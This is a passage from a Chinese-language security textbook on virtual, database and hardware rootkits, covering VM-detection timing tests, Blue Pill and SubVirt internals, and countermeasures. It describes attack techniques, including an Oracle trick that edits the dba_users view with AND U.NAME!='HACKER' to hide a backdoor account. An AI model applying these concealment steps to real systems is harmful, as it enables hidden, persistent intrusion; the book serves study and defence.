cmd VM对x86指令IN设置陷阱并且仿真这个指令进行操作,首先读取IN指令的参数,将其放入EAX(魔法值VMXh)和ECX(操作数0x14表示获取内存大小)寄存器,然后返回一个值。如果返回值等于VMXh,则代码在VM中执行。 最后一个测试(测试7)根据eEye的Derek Soeder的研究(http://eeyeresearch.typepad.com/blog/2006/09/another_vmware_.html)。这个测试基于高级的体系结构概念,简单地说,它依靠VMWare中的一个不正确地处理CPU保护错误的缺陷,对这个处理的仿真不正确,并且在错误发布之前就发出执行转移,而“真正”的处理器会首先发布这个错误。因此,测试7导致一个错误的发生,然后检查CPU寄存器值寻找这个缺陷。 Bugcheck创建的Vrdtsc:时间差异 Vrdtsc工具是加拿大研究人员Bugcheck于2006年编写的,进行各种时间测试以了解代码是否在虚拟环境中执行。这个工具以硬件辅助的虚拟环境如Intel的VT-x技术作为工作对象,使用两个不同的Intel指令——CPUID和RDTSC(读取时间戳计数器)进行两种测试。 第1个测试发出1000万个CPUID指令并测试该请求花费的处理器“嘀嗒”(tick,处理器级的时间单位)数量。在非虚拟化机器上,该请求应该花费大致50~150个tick,但是使用具备VT-x硬件支持的虚拟机要花费5000~8000个tick。代码如下: printf("Attempting to detect a#VMEXIT on a cpuid instruction……\n"); ticks=get_cpuid_loop_ticks(NUM_ITERS); printf("Total iterations:%u\n" "Total ticks:0x%010I64x\n" "Ticks per iteration:%I64u\n",NUM_ITERS,ticks,ticks/NUM_ITERS); if(ticks/NUM_ITERS<150) printf("Doesnt look like a VM based on CPUID time to execute\n"); else printf("Looks like a VM and CPUID is causing a#VMEXIT\n"); 第2个测试发出RDTSC指令1000万次,然后根据tick计数以及使用time()函数检查起始时间来比较实际时间的差异。如果总执行时间大于10秒,或者RDTSC指令花费超过15个tick(非虚拟化机器上所花费的时间),则该工具报告自己处于VM之中。 目前,我们已经关注了检测虚拟机存在的多种方法。现在很明显,在虚拟机中实现真正的透明已经被证明是不可能的。我们现在将注意力转向使Rootkit脱离虚拟环境的方法。 5.2.5 脱离虚拟环境 当恶意软件检测到自己陷入虚拟环境之中,它可能希望逃脱到主操作系统而不是简单地终止其进程。一般来说,脱离VM需要使用一个利用程序导致一个服务或者整个VM崩溃,使恶意软件逃脱虚拟的牢笼。VMWare文件共享服务中的一个目录遍历漏洞就是例子之一,这个漏洞造成该服务提供到主OS文件系统的根目录访问权(http://www.coresecurity.com/content/advisory-vmware)。目录遍历攻击是渗透测试界著名的技术,这种测试利用应用程序解释用户输入中的弱点获得文件或者文件夹的未授权访问。通过模糊(fuzzing)技术进行的彻底的VM稳定性测试在Tavis Ormandy的一篇文章中作了介绍(http://taviso.decsystem.org/virtsec.pdf)。模糊技术也是一种渗透技术,试图通过向应用程序提供残缺的输入来取得未授权的系统访问。 但是,VMWare最常受到侵害的特性是VMWare Tools(一个生产率套件,允许主操作系统和客户操作系统进行交互,例如共享文件)所使用的未写入文档的ComChannel接口。ComChannel接口是VMWare使用所谓后门以及未写入文档的特性的最广为人知的例子。在SANSfire 2007会议上,Ed Skoudis和Tom Liston示范了由ComChannel构建的各种工具: ·VMChat ·VMCat ·VMDrag-n-Hack ·VMDrag-n-Sploit ·VMFtp 所有这些工具都使用利用技术导致从客户操作系统中通过ComChannel链接对主操作系统进行无意的/未经授权的访问。第一个工具VMChat实际上从ComChannel接口对主操作系统进行了一次DLL注入。一旦DLL进入主操作系统的内存空间,就会打开一个后门通道,允许主操作系统和客户操作系统之间的双向通信。 事实上,Ken Kato(在5.2.4节中提到过)已经在其“VM Back”项目中对ComChannel问题做了数年的研究(http://chitchat.at.infoseek.co.jp/vmware/)。 尽管这些工具描述了VM隔离和保护中的严重问题,但是并没有表现虚拟技术中最关键的威胁。第三类恶意软件——系统管理程序替换虚拟恶意软件代表这种威胁。 5.2.6 劫持系统管理程序 高级虚拟Rootkit的终极目标是颠覆系统管理程序——控制虚拟环境的大脑。如果Rootkit能够将自身插入到客户操作系统之下,它就能控制整个系统。 HVM Rootkit通过几个似乎不太困难的步骤能达到以下目的: 1)在客户操作系统中安装一个内核驱动程序。 2)寻找并且初始化硬件虚拟化支持(AMD-V或者Intel VT-x)。 3)从驱动程序中将恶意的系统管理程序代码装入内存。 4)创建一个新的VM来放置主操作系统。 5)将新的VM与Rootkit的系统管理程序绑定。 6)启动新的VM,实际上将主操作系统切换到无法脱离的客户模式。 这一过程完全在运行中发生,不需要重新启动(但是SubVirt Rootkit需要重新启动使Rootkit装入,之后的过程就不再需要重新启动)。 但是,在我们详细讨论这些步骤之前,必须研究第4章中简单提到的一个新概念——Ring 1。 Ring 1 为了完成这些目标,虚拟的Rootkit必须利用目前两个主要的CPU制造商——Intel和AMD提供的硬件虚拟化支持所建立的一个新概念,这个新概念就是Ring 1。如果你回忆一下第4章中的x86 CPU特权级别图,就会记得特权级别的范围是从Ring 0(最高特权,OS运行于这个模式)到Ring 3(用户应用程序运行于这个模式)。Ring 0曾经是最高特权的级别,但是现在Ring 1包含硬件级系统管理程序,特权级甚至高于操作系统。 为了便于CPU制造商实现Ring 1(从而为虚拟软件添加原生硬件支持),它们添加了多条新的CPU指令、寄存器和处理器控制标志。AMD命名这些增加的支持为AMD-V安全虚拟机(Secure Virtual Machine,SVM),Intel命名自己的技术为虚拟技术扩展(Virtualization Technology extensions,VT-x)。我们来看看这些技术之间的相似之处。 AMD-V SVM/Pacifica和Intel VT-x/Vanderpool 为了理解HVM Rootkit如何利用这些基于硬件的虚拟化技术,扎实地掌握这些扩展为x86指令集增添的功能是很重要的。下表总结了这些扩展所增加的主要命令和数据结构。Blue Pill和Vitriol使用了这些扩展。 这不是x86指令集中添加的新内容的完整列表,但是实际上新内容相当少。这种硬件支持的轻量级特性是因为性能的原因。 5.3 虚拟Rootkit实例 下面的Rootkit实例仅仅是当前已经公开的虚拟Rootkit实例。SubVirt是VMBR的一个例子,而Blue Pill和Vitriol是HVB Rootkit的例子。 ·SubVirt由密执安州大学的Samuel T.King和Peter M.Chen以及Microsoft研究所的Yi-Min Wang、Chad Verbowski、Helen J.Wang和Jacob R.Lorch协同开发,针对Intel x86技术,在Windows XP上使用Virtual PC,在Gentoo Linux上使用VMWare进行了测试。 ·Invisible Things Lab的Joanna Rutkowska开发的Blue Pill针对AMD-V SVM/Pacifica技术,在x64 Vista上进行了测试 ·Vitriol由Matasano Security的Dino Dai Zovi开发,针对Intel VT-x,在MacOS X上进行了测试。 SubVirt:基于虚拟机的Rootkit(VMBR) SubVirt将自身插入到主操作系统之下,创建一个新的系统管理程序。它依靠x86体系结构而不是像SVM这样的特定虚拟技术,通过修改系统启动顺序来装入。作者还实现了恶意服务以展示Rootkit在安装后可能造成的破坏。SubVirt同时针对Windows XP和Linux,但我们将只介绍Windows方面的VMBR。 为了修改启动顺序,SubVirt需要并且假设攻击者已经得到了系统上的根特权并且能够将VMBR复制到目标系统的持续性存储上。尽管这个假设可以接受,但是这种要求确实将Rootkit暴露在某些脱机攻击之下,并且限制了这个工具在某些情况中的适用性。这个VMBR复制到Windows XP的第一个活动分区。 启动顺序被修改为首先执行VMBR,替代OS引导程序,这通过覆盖磁盘上的BIOS控制权转移的目标扇区完成。为了避免防病毒软件、HIDS/HIPS和个人防火墙解决方案可能向用户警告这一活动。SubVirt使用一个内核驱动程序注册LastChanceShutdown回调例程。这个例程在系统关闭时由操作系统调用,这时大部分线程已经终止,文件系统已经卸载。作为第二级保护,这个恶意内核驱动程序是一个文件系统驱动程序和大部分防病毒类产品之下的低级驱动程序,因此这些高级别的驱动程序将不会发现SubVirt。作为第三层保护,这个低级内核驱动程序挂钩低级磁盘驱动程序的write()例程,只允许VMBR被写入到磁盘上的启动块中。 系统重启之后,BIOS将执行权转移到VMBR,VMBR装入一个定制的“攻击”操作系统,作为恶意服务和一个系统管理程序的宿主。这个系统管理程序控制并且启动一个经过封装的主操作系统(作者称之为“目标OS”),同时攻击操作系统为在目标OS内操作的恶意软件提供恶意服务和低级保护(不为目标OS所知)。 这个VMBR的目标是支持运行于目标OS中的恶意软件,现在这个恶意软件已经被装入一个VM中。VMBR通过3类恶意服务来做到这一点,作者将这些服务定义如下: ·完全不与目标OS通信的服务。例如,垃圾邮件中继、僵尸网络以及仿冒Web服务器。 ·观察目标OS数据或者事件的服务。例如,击键记录程序和网络封包嗅探程序。 ·对目标OS执行进行敌意修改的服务,例如,抛弃封包或者删除可疑数据。 这个VMBR能够在不为目标OS所知的情况下提供这些服务,因为VMBR能够对目标OS发出的硬件指令设置陷阱并且修改这些指令的功能。这是普通的VM仿真程序的工作,但是在这时用于恶意软件的目的。 我们将简单地介绍SubVirt代码库中实现的这3类服务的一些实例。 仿冒Web服务器服务 SubVirt VMBR中的仿冒Web服务器是开发用于描绘与目标操作系统没有交互的恶意代码的。仿冒网站是试图引导用户泄露个人身份信息(PII)的真实网站的诱饵。这种信息通常包含姓名、地址、社会保险号码、信用卡信息或者用户名及密码。这个仿冒网站使用攻击操作系统中的一个thttpd web服务器。虚拟网络设置被修改,除了绑定到端口8080的入站TCP被引导到仿冒网站以外,其他所有流量都被重定向到目标。VMBR环境没有包含在目标操作可见的系统的任何状态或者事件信息。 击键记录程序服务 和仿冒Web服务器一起,SubVirt VMBR包含一个可选的击键记录程序。击键记录程序是一个用于收集和存储所有击键的应用程序。在这个例子中,它从虚拟机上的一个Rootkit之中运行,试图在目标OS不知情的情况下收集所有击键数据。这通过仿真VMBR中的键盘模块复制所有击键并且将其发送给攻击OS。攻击OS接收到这些击键之后,一个定制的击键程序就会搜索可能的密码。在攻击系统上分析了击键之后,数据被转发给目标OS。 敏感信息文件扫描器服务 SubVirt的作者还开发了一个扫描目标文件系统寻找可能包含敏感信息文件(例如用户密码或者私有密钥)的模块。 防御对策服务 这个由作者实现的服务表现了大部分第三类服务中最有侵略性的服务——主动修改目标OS。这个服务实际上是修改了Windows XP中处理执行文件到进程地址空间映射的输出内核函数(也就是Windows装入程序)。如果修改后的函数发现Red Pill程序,就在程序的SIDT指令上设置一个断点。这样,当Red Pill运行并且调用SIDT,它就会中断执行进入系统管理程序(因为系统管理程序为了仿真而设置这个指令的陷阱),然后篡改结果来欺骗Red Pill。 通过重新启动和关机保持控制 我们已经看到了SubVirt Rootkit的多种隐蔽能力,例如通过底层的磁盘驱动程序栈钩子修改启动顺序,以及安装服务透明地监控或者欺骗目标OS。这个VMBR甚至添加了更隐蔽的特性,阻止系统真正关闭。如果系统关闭,VMBR将容易受到脱机攻击,例如BIOS将控制权传递给可启动的CD-ROM或者USB驱动器,检测程序就可能发现并清除SubVirt。 为了保护自己免遭系统重启的威胁,这个VMBR是复位虚拟硬件而不是物理硬件。这给目标OS造成了一个假象,认为系统已经重启,实际上,物理系统仍在运行。为了避免系统关闭(例如用户按下电源关闭按钮),VMBR具备使用高级配置和电源接口(ACPI)休眠状态的能力,使系统似乎真正关闭。这时系统处于节能模式,电源仍然提供给RAM,但是大部分运动部件关闭。 SubVirt对策 SubVirt的作者提出了多种对抗其Rootkit的方法。第一种方法是使用硬件(如保存了经过验证的启动设备hash值的可信任平台模块(Trusted Platform Module,TPM))验证启动顺序。在启动期间,BIOS计算启动顺序项目的hash值并与已知的hash值比较以确保没有恶意软件存在。第二种方法是使用可移动媒体启动并用取证工具(如Helix Live-CD)以及Rootkit检测程序(如Strider Ghostbuster)扫描系统。最后一种方法是采用安全启动过程,如预先存在的系统管理程序或者验证各种系统组件。 SubVirt方法的总体弱点包括: ·必须修改硬盘的启动扇区才能安装,这会引起脱机检测技术的怀疑。 ·针对没有完全虚拟化的x86体系结构(某些指令如SIDT运行在非特权模式),使其引起前 面讨论过的所有检测技术的怀疑。 ·使用一个试图仿真指令并提供虚拟硬件的“重量级的系统管理程序”(VMWare和Virtual PC),使其引起前面讨论过的通过硬件痕迹的检测技术的怀疑。 Blue Pill:系统管理程序虚拟机(HVM)Rootkit Blue Pill在2006年的Black Hat USA上发表,现在的发展已经超过了原来的概念验证范畴,现在它是一个稳定的研究项目,由多位开发人员支持,并且已经移植到其他体系结构中。我们将介绍原始的Blue Pill,它基于AMD64 SVM扩展。 主操作系统在运行中使用AMD64的安全虚拟机(SVM)扩展被引入虚拟机中。这是其他虚拟Rootkit(如SubVirt)所不具备的特性。SVM是添加到AMD 64指令集体系结构中的一个指令集,为系统管理程序提供硬件支持,在Rootkit将主OS封装到VM中之后,监控客户OS接受恶意服务的命令。 Blue Pill首先监测虚拟环境,然后在主操作系统之下注入一个“瘦系统管理程序”,将其封装在一个虚拟机中。作者将“瘦系统管理程序”定义为一个透明地控制目标机器的程序。这就立刻拉响了警报,因为我们在前面已经讨论过,就像Garfinkel等人在他们的文章中论述过的(http://www.cs.cmu.edu/~jfrankli/hotos07/vmm_detection_hotos07.pdf),提供透明虚拟化是非常困难的。这是Invisible Things Lab的研究人员和其他研究团体都面临的一个关键点。 Blue Pille以如下的方式装入: 1)装入一个内核模式驱动程序。 2)设置一个特殊CPU寄存器为1(EFER MSR),启用SVM支持。 3)分配和初始化一个称为虚拟机控制块(VMCB)的特殊数据结构,这个结构用于在Blue Pill系统管理程序接管之后“监禁”主操作系统。 4)将系统管理程序复制到内存的隐藏部分。 5)将主处理器信息保存在一个称为VM_HSAVE_PA MSR的特殊寄存器中。 6)修改VMCB数据结构以包含允许客户操作系统将执行回传给主操作系统的逻辑。 7)设置VMCB,使之看上去像打算“监禁”的目标VM的保存状态。 8)跳转到系统管理程序代码。 9)执行VMRUN指令,传递“监禁”VM的地址。 一旦发出VMRUN指令,CPU就运行于非特权客户模式。仅当客户VM发出VMEXIT指令时CPU执行级别才得以提升。Blue Pill系统管理程序捕捉这条指令。 Blue Pill的多种功能有助于其隐蔽性: ·“瘦系统管理程序”不试图仿真硬件或者指令集,所以前面讨论的大部分检测方法都无效。 ·对性能的影响很少。 ·Blue Pill在运行中安装并且不需要重启。 ·使用“Blue Chicken”在检测到定时指令时短暂地卸载Blue Pill系统管理程序,以此来阻止时间检测。 Blue Pill包含如下局限: ·不能持续,即重启会删除它。 ·研究人员已经指出快速重编址缓冲器(TLB)、条件预测、基于计数器的时钟以及#GP异常能够发现Blue Pill的副作用。这些都是Blue Pill无法直接控制的处理器专用结构/功能,但是它们直接受到Blue Pill使用系统资源的影响,就像其他软件所产生的影响一样。 Vitriol:硬件虚拟机(HVM)Rootkit Vitriol Rootkit与Joanna的Blue Pill在Black Hat USA 2006上同时发布。这个Rootkit和Blue Pill是一阴一阳,因为Vitriol Rootkit针对的是Intel VT-x硬件虚拟化支持,而Blue Pill针对的是AMD-V SVM支持。 前面已经提到过,Intel VT-x支持提供硬件级别的CPU指令,这些指令由VT-x系统管理程序用于提升或降低CPU的执行级别。VT-x术语中有两种执行级别:VMX root(Ring 0)和VMX non-root(“较低特权级”的Ring 0)。客户操作系统启动和运行于VMX non-root模式,但是当它们需要访问特权指令(例如执行I/O操作)时可以发出一个VM exit指令。这时,CPU提升到VMX root。 这种技术与AMD-V SVM支持没有本质的不同:两种技术都完成相同的目标——具有完全虚拟化支持的硬件级别系统管理程序。Blue Pill和Vitriol Rooktit也以相似的方式利用它们: ·在目标OS中安装一个内核驱动程序。 ·访问低级虚拟化支持指令(例如VT-x中的VMXON)。 ·创建用于恶意的系统管理程序的内存空间。 ·为新的虚拟机创建内存空间。 ·将运行中的OS移植到新的VM中。 ·为所有来自新VM的命令设置陷阱,保护恶意的系统管理程序。 Virtiol在3个主要函数中实现所有步骤,在不为人知的情况下将主OS放入一个VM中: ·Vmx_init()检测并且初始化VT-x。 ·Vmx_fork()将运行中的主OS装入一个VM中,并且在操作系统之下放置一个系统管理程序。 ·On_vm_exit()处理VMEXIT请求并且进行仿真。 最后一个函数还提供典型的Rootkit功能:访问过滤器设备、隐藏进程和文件、读取/修改网络流量及记录击键。所有这些功能在操作系统之下的Rootkit系统管理程序中实现。 虚拟Rootkit对策 随着集团公司基础架构和数据中心持续地从裸机转向虚拟服务器,虚拟Rootkit、恶意软件和威胁将不断增长。自从围绕2006年Blue Pill(以及宣传较少的Vitriol)的发行引起的热潮之后,AMD和Intel已经对其虚拟化技术进行改进以对抗这一威胁,甚至直到一年之后都没有发布源代码。根据Crucial Security的白皮书(http://www.crucialsecurity.com/documents/hvmRootkits.pdf),AMD的AMD 64处理器revision 2包含了在启用和禁用SVM虚拟化技术时要求一个加密密钥的功能。回忆一下,Blue Pill装入的先决条件是:能够通过设置EFER MSR寄存器的SVME位为1启用SVM。也就是说,如果不能在代码中启用或者禁用SVM,Blue Pill将不能运行。 使用概念验证型代码,很可能在不远的将来还有更多虚拟Rootkit发布。虽然关于HVM可疑的“100%不可检测”特性的争论仍在持续,但是并不能改变这些Rootkit存在并且代表着不断增长的威胁这一事实。 5.4 小结 回顾虚拟Rootkit的类型,这3种类型都必须能够确定自己处于虚拟环境。但是,虚拟感知恶意软件正在消亡。正如SubVirt的作者所指出的,恶意软件最终别无选择,一定要在虚拟环境中运行,因为数据中心和大型商业和政府组织正在持续地将传统的物理资产移植到虚拟资产中。很快恶意软件作者就必须接受他们将在虚拟环境中受到监控的可能性,因为从主机系统上得到的收益将会超过被发现和分析的风险。实质上,VM检测的问题对恶意软件来说将不成问题。 对于代表高级虚拟Rootkit的其余类型,即VMBR和HVM Rootkit,研究人员和Blue Pill的作者已经就讨论过的检测方法(时间、资源和逻辑异常)实际上是检测Blue Pill本身还是仅仅检测SVM虚拟化的存在进行了激烈的争论。这一争论归结到是否假设未来的计算机系统是否100%都是虚拟化的。如果全都实现了虚拟化,那么主操作系统检测自己处于VM中就毫无意义。Blue Pill作者站在这一出发点上,将当前的VM检测技术的发现比作将系统中存在网络活动作为僵尸网络的证据。 除了这些争论以外,Blue Pill作者还提出了一些在当时能够阻止所有HVM Rootkit(也包括SubVirt)的对策: ·必要时在BIOS中禁用虚拟化支持。 ·未来的基于硬件的系统管理程序,只允许加密签名的虚拟机映像装入。 ·“硬件Red Pill”或“SVMCHECK”——要求唯一密码来装入VM/系统管理程序的硬件支持指令。 虚拟化为Rootkit作者和Rootkit检测者同样带来了独特的挑战。毫无疑问,我们还没有看到这一论战的结果。 可以肯定的是,系统管理程序正在用于子版本(它们所预期的目的)之外的目的。已经有两种基于系统管理程序的Rootkit检测程序发布:North Security Labs(http://northsecuritylabs.com/)开发的Hypersight和Rutgers大学的学生开发的Rutgers(http://www.cs.rutgers.edu/~iftode/intrusion06.pdf)。实际上这些工具做的事情和Blue Pill一样,但是它们的目的是发现并且彻底阻止虚拟和传统Rootkit装入。 第6章 Rootkit的未来:如果你现在认为情况严重 Rootkit帮助攻击者维持他们的未授权访问。你已经学习了Rootkit使用的各种攻击和方法,以及Rootkit修改用户环境、哄骗用户相信不存在攻击者的方法。Rootkit正在演变,就像病毒变成更有恶意的软件如广告软件、间谍软件和bot那样。现在,Rootkit在技术上仍然是难以建立、部署和维护的,许多技能较低的攻击者还不能利用Rootkit的技术。但是这种情况正在改变。目前,Rootkit需要许多攻击者所不具备的技能水平。Rootkit包括了对现有系统功能的回避或者扩展,这要求对内核级别编程、驱动程序开发的理解,或者在传统编程课程中不曾传授的深入的用户空间编程。具体地说,建立许多当今的Rootkit所需要的环境对于传统编程人员来说并不容易获得。传统编程人员必须安装特殊的软件开发包(SDK)并且建立环境,才能编译和分发Rootkit。 Rootkit开发人员开始将Rootkit打包为模块,并且培训Rootkit用户如何修改以及使Rootkit适应特殊的用途。而且,公开的Rootkit代码在Rootkit.com这样的网站上可以获得,这也减少了将Rootkit成功地整合到其他软件中的技术知识要求。 从2005年起,基于内核的Rootkit以及用于发现Microsoft Windows环境Rootkit的技术大体上保持不变。唯一真正的革新是,远离内核级别的系统服务描述表(SSDT)钩子的尝试以及添加特殊功能以避免被流行的Rootkit检测软件发现。每个复杂性、技术和创意的改进都是永无止境的竞争的结果。由于技能较低的供给者越来越容易使用Rootkit,Rootkit的类型和目的也随之改变。有创新精神的攻击者开始利用Rootkit概念(如隐蔽性)和新的部署方向,以保证他们对数据库、整个PC和系统的利用不会被发现。 6.1 复杂性和隐蔽性的改进 由于攻击者和防御者之间不断的竞争,Rootkit的未来很有可能与病毒和蠕虫相似;在欺骗、隐蔽和避免被业界出现的单独Rootkit检测工具所发现等方面逐步地进行革新。代码片段和容易取得的Rootkit依赖的技术是在21世纪初引入的,当时操作系统供应商如Microsoft和Linux还没有如此强烈地关注安全。对于Windows Server 2008、Vista的最近版本以及集成了内核补丁的Linux,Rootkit更加难以在内核模式或者用户模式下操作而将被迫进入系统的应用程序级别。安全型供应商和软件开发商如Microsoft开始实施安全体系结构评估、源代码评估以及其他安全度量,以确保类似Rootkit的应用程序不能利用操作系统的内核模式或者用户模式部分。防御者在竞争中已经提高了一步,所以攻击者必须放弃OS中的嵌入式Rootkit和用户空间,而将Rootkit功能如隐蔽性和后门功能在应用程序(如CRM或者数据库)本身中提供。 随着Rootkit合并到应用程序层,越来越多的混合型威胁、或者包含不同类型恶意软件(如使用病毒感染文件的蠕虫,或者使用Rootkit隐藏的病毒)的威胁将成为标准。Rootkit检测技术将成为防病毒和防间谍软件供应商的需求;否则他们将无法发现这些威胁。 Rootkit的安装方向也因为混合型的威胁而改变,从单独的安装转向与现有恶意软件更深入的集成,特别是由用户有意安装的恶意软件类型,如屏幕保护程序、应用程序或者广告软件支持的应用程序。Rootkit感染将涉及较小的注入方向,启用运行中下载Rootkit安装,这样可以为低技能的攻击提供模块性和Rootkit功能的重用。 检测一个Rootkit只是问题的一部分。删除Rootkit使受其保护的其他威胁如木马、广告软件或者病毒得以处理可能是无法实现的,如果试图删除,可能导致严重的数据丢失或者系统不稳定。越来越多的防病毒软件和安全供应商将需要遵循一个消除杀伤力的过程而不是现在我们所了解和使用的“清除”过程。例如,你可能删除了Rootkit使用的实际文件(如内核驱动程序或者.dll)并且重新启动。这种清除过程是安全软件一般的操作;但是,这需要供应商的研究人员了解每个文件、注册表项等,删除了这些项目才能保证威胁已经正确地清除。这个任务是时间密集型的并且容易出错。如果遗漏了一个文件导致Rootkit重新安装怎么办呢?通过禁用钩子、避免钩子或者设置目录权限以避免Rootkit的子组件运行等手段,使Rootkit的核心功能不能操作,从而消除Rootkit的杀伤力,这样就能确保成功并且不需要担心遗漏需要清除的一个文件或者注册表键值。而且,清除过程可能导致系统不稳定,造成蓝屏、应用程序错误或者数据破坏,这些都可以通过消除杀伤力的过程来避免。 数据库Rootkit 最近由于来自美国联邦政府和各组织保护数据的IT管理框架的压力,数据库正在成为许多攻击者策略的中心,因为他们进行身份盗窃所需的数据存储在数据库中。令人难过的是,数据库安全技术仍然没有得到积极的实施,似乎没有人评估数据库服务器的访问控制日志,这使得数据库Rootkit成为了控制数据库服务器的好方法。 尽管数据库Rootkit在2005年由Alexander Kornburst在Red Database Security GmbH会议上引入,但是它们并没有像业界所预期的那样崭露头角。数据库Rootkit技术的新进展以及预制的数据库Rootkit的销售将开始改变这一情况,加速其开发和部署。例如,一家零日攻击开发公司Gleg Ltd以2500美元的价格出售MS SQL和Oracle数据库Rootkit,作为其零日攻击软件包的一部分。这个软件包包含确保数据库Rootkit始终使用最新技术以避开防Rootkit防御的支持和维护。 数据库Rootkit的形式可能是因为数据库服务器具有一个与操作系统非常相似的体系结构。数据库服务器和操作系统都有进程、作业、用户以及可执行程序,因此,第二部分的前几章讨论的Rootkit技术可以直接移植到数据库服务器中,保持对数据库服务器中数据库的控制。表6-1详细列出了操作系统命令和等价的数据库命令。 在数据库中实现一个Rootkit有几种不同的方法。第一代的数据库Rootkit简单地修改内部查询和数据库依赖的视图的执行路径。例如,我们来看看Oracle如何执行一个查询寻找数据库中的一个用户名: Select username from dba_users; 首先,Oracle执行名称解析以确定dba_users对象是不是当前框架(schema)(如表、视图或者过程)中的局部对象。如果是局部对象,Oracle将使用它。接下来,Oracle将验证是否有叫作dba_users的私有同义词(private synonym)。如果有,Oracle将使用它,否则Oracle将检查dba_users是否是公共同义词(public synonym),如果是则使用它。 这个过程对于理解某个数据库对象的操纵对Oracle名字解析例程返回的结果的影响来说很重要。图6-1展示了Alex Kornburst的Defcon 14报告中的各种Oracle对象群组,这可以在Black Hat网站上获得(http://www.blackhat.com)。 正如你在图6-1中的名称解析过程中所看到的,如果你能够控制所有同义词,就可以改变原始SQL查询的结果。因此,为了调整结果你可以: ·创建一个相同名称的本地对象。 ·创建指向不同对象的私有同义词。 ·创建指向不同对象的公共同义词。 ·切换到不同的框架。 图 6-1 Oracle数据库名称解析 进行这种执行路径修改攻击的最有效途径是从数据库的用户列表中删除一个用户。例如,如果攻击者添加了名为HACKER的新用户到数据库中,这样他可以在任何时间登录,攻击者可以修改dba_users对象(Oracle中的一个视图),在应用程序或者管理员执行查询列出数据库中用户时排除这个用户: SQL>select username from dba_users; USERNAME —— SYS SYSTEM DBSNMP SYSMAN MGMT_VIEW OUTLN MDSYS ORDSYS EXFSYS HACKER …… 现在,攻击者只要在dba_users视图的WHERE子句中添加一个附加的条件语句过滤新用户名HACKER。对于Oracle,攻击者只要添加AND U.NAME!='HACKER'并且保存视图就可以了。 每当相信dba_users视图的图形化工具或者管理员查询该视图,都不会看到HACKER用户,这种方法虽然简单,但是不完美,因为其他也会列出用户的视图必须更新,以排除HACKER用户,ALL_USERS视图也是如此。 在Oracle的执行路径中,也可以修改对象来隐藏HACKER用户拥有的进程和对象,方法是修改各种会话对象,包括V_$SESSION、V_$PROCESS、GV_$SESSION和FLOW_SESSIONS。 PL/SQL包也可以修改以执行代码,确保Rootkit仍然安装或者在未安装时重新安装Rootkit。尽管Microsoft SQL和Oracle具有确保核心包或者存储过程(一组集合在一起并且成组执行的SQL语句)的集合不被修改的技术,但是许多Oracle数据库用户创建的数据库或者应用程序专用包可以修改。而且,存在用于Oracle 8i/9i和10g展开、修改、重新压缩以及重新安装Oracle包的应用程序。这个问题在Microsoft SQL中不存在,因为它的视图都有数字签名。 Kornburst已经发布了一个能够在Oracle自带的管理工具中隐藏用户、进程和作业的Oracle Rootkit实例。修改数据库可执行文件本身也可用于修改数据库服务器的功能,在执行特定查询时使用不同的表、视图或者存储过程。控制执行路径可以使攻击者调整和伪造查询或者函数返回的结果。 数据库Rootkit对策 现在有多种工具能够寻找这些攻击,但是采用内存攻击的最新Rootkit对于Red-Database-Security的repscan和Application Security公司的DbProtect工具来说还难以检测,原因是它们所采用的检测技术。这些工具扫描所有的数据库对象,并且计算每个表、视图等扫描中识别的对象的MD5(hash)值。视图是一个虚拟表,基于SQL查询,但是不像表一样存储数据。视图的数据在你访问时动态生成。当数据库安全检测工具运行时,比较MD5和基准值来确定数据库是否被修改。尽管这些工具能够检测这些Rootkit,但是最佳的对策是在查询数据库时采用底层表,而不是视图。 幸运的是,基于内存的攻击是与平台相关的,并且只在Windows平台上的Oracle中进行过讨论并出现过,而大部分企业不会在Windows平台上运行Oracle。尽管大部分数据库Rootkit都工作于Oracle,但是Microsoft SQL Server也是容易遭到攻击的,Microsoft已经为SQL Server 2005提供了更多的安全特性以帮助避免数据库Rootkit。这些修改包括数字签名视图和数字签名包的功能。 基于硬件的Rootkit Rootkit从一开始就是基于软件的,并且持续地为了控制操作系统进行永不停歇的斗争。这是软件之间的争斗,最终,一般都是先装入的一方获胜。而且,来自防病毒公司(如Symantec和McAfee)的新型Rootkit清除软件迫使研究人员寻找新的途径来存储、装入和执行他们的Rootkit。像PC的BIOS、图形卡和扩展ROM(如企业NIC卡的PXE启动能力)等硬件提供了新场所,使Rootkit代码可以安全地存储,从而避开基于软件的检测工具。 虽然是一种相对新颖的技术,但是基于硬件的Rootkit正在快速地发展,因为它们有许多年的基于硬件的病毒的数据可供学习。1998年,第一种感染硬件的病毒CIH,使用随机的垃圾数据刷新BIOS,使机器无法使用,因为所有PC都需要BIOS启动。Rootkit开发人员已经关注于利用相同的方法来存储Rootkit的代码或者数据,这样它们可以在重新启动、硬盘格式化或者主操作系统重新安装时存活下来。感染BIOS的好处是带来更好的隐蔽性,因为传统的取证和事故响应调查不会分析像BIOS或者板载内存这样的硬件。 目前,还不存在这样的硬件Rootkit;但是,NGS Consulting的John Heasman已经利用高级配置和电源接口(ACPI),开发了迫使主板硬件修改传统操作系统进程禁止进入内存空间的概念验证性代码。例如,使用这种技术,攻击者可以禁用所有Windows和Linux中的安全访问令牌检查。Heasman还示范了ACPI接口如何用于执行像Rootkit装入程序或者安装程序这样的原生代码。ACPI方法并不完美,因为它是一个混血Rootkit,需要软件和硬件一同工作才能实施,但是它确实提供了一个Rootkit开发方向的绝佳范例。 除了ACPI可以作为装入机制以外,Heasman还开创性地进行了使用PCI扩展ROM的研究,例如PCIe图形卡上的EEPROM或者网络卡上的EEPROM。Heasman声称,通过改编开源的PXE软件,如Etherboot/gPXE,攻击者可以实现修改过的gPXE ROM以下载恶意ROM,并且启动像eEye BootRoot(一种可以颠覆Windows操作系统的启动扇区Rootkit)这样的Rootkit。 基于硬件的Rootkit对策 基于BIOS和PCI的Rootkit的最大负担是需要与大量的BIOS变种的PCI ROM变种集成。为一种NIC或者BIOS开发的Rootkit在另一个BIOS版本上可能无法工作。而且,芯片制造商如Intel和AMD已经在致力于主动预防这些攻击类型的方法,例如可信平台模块(TPM)。TPM是一个存在于主板上的微控制器,为主机提供加密和密钥管理。TPM还包含平台专用的度量hash,可以用于确保只执行来自原始制造商的ROM。最后,TPM提供确保无修改启动的安全启动功能。 许多评论和文章已经谈到了关于Rootkit使用图形处理单元(GPU)的高级研究。来自NVidia等公司的新型图形卡提供了令人惊讶的处理能力,以及不使用主机CPU或者内存的真正代码执行能力。在远离主机RAM和CPU的地方执行一个Rootkit或者隐藏数据,都会带来非常好的隐蔽性。因为这些文章中所提出的GPU 